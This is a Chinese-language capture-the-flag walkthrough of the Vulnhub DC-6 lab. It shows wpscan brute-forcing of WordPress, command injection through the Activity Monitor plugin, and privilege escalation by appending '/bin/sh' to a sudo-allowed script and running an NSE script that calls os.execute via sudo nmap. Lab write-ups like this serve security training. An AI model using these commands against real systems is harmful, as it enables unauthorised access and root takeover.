DVWA-DC-6
靶机IP:192.168.20.140
kaliIP:192.168.20.128
网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)
信息收集
nmap扫描靶机端口及版本信息
dirsearch扫目录
发现是个wordpress建站
我们去访问前端界面
存在重定向,修改hosts文件,加入192.168.20.140 wordy
漏洞利用
与DC-2都是用的wordpress建站,同样考虑用wpscan扫描网站漏洞。
wpscan --url http://wordy --enumerate u爆破用户名
把用户名存成字典ueser.txt
之后根据vulnhubDC-6首页作者的提示生成字典。
┌──(root㉿kali)-[/home/kali/Desktop/DC-6]
└─# cat /home/kali/Desktop/jwt/rockyou.txt | grep k01 > pass.txt
用wpscan爆破用户,有了用户名字典和密码字典
wpscan --url http://wordy -U user.txt -P pass.txt
通过/wp-admin路径登入后台,浏览功能,发现一个Activity Monitor功能,里面的tools可以执行命令,用ping 127.0.0.1 | ls进行测试,发现存在命令注入
用nc反弹shell
之后生成交互式shell
提权
查看SUID提权,没有发现提权点。
之后浏览目录,在passwd中发现四个用户
接下来去他们目录看下,在jens中发现个thing-to-do.txt,cat一下,发现graham的密码
尝试连接
$ su graham
su graham
Password: GSo7isUM1D4graham@dc-6:/home$ ls
之后看下sudo提权,发现jens目录下的脚本文件可以执行
graham@dc-6:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh
再看下文件权限,我们的用户graham正好在devs用户组,有rwx权限
graham@dc-6:/home/jens$ ls -l
ls -l
total 12524
-rwxrwxr-x 1 jens devs 58 Jun 11 22:40 backups.sh
-rw-r--r-- 1 jens jens 12819077 Jun 11 22:19 backups.tar.gz
graham@dc-6:/home/jens$ id
id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
graham@dc-6:/home/jens$
我们在脚本中写入bash
graham@dc-6:/home/jens$ echo "/bin/sh" >> /home/jens/backups.sh
echo "/bin/sh" >> /home/jens/backups.sh
之后执行,切换到用户jens
graham@dc-6:/home/jens$ sudo -u jens /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
tar: Removing leading `/' from member names
$ whoami
whoami
jens
查看sudo提权
$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap
看下nmap sudo提权
7.40
这个靶机nmap版本是7.40,不是(b)的老版本,所以用(a)
#.nse是nmap的插件拓展名
$ echo 'os.execute("/bin/sh")' > /tmp/pass.nse
echo 'os.execute("/bin/sh")' > /tmp/pass.nse
$ sudo nmap --script=/tmp/pass.nse
sudo nmap --script=/tmp/pass.nseStarting Nmap 7.40 ( https://nmap.org ) at 2024-06-11 22:57 AEST
# whoami
root
# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
# cat /root/theflag.txtYb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"' YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8) Congratulations!!!Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via @DCAU7.提权成功,find命令找打flag,cat一下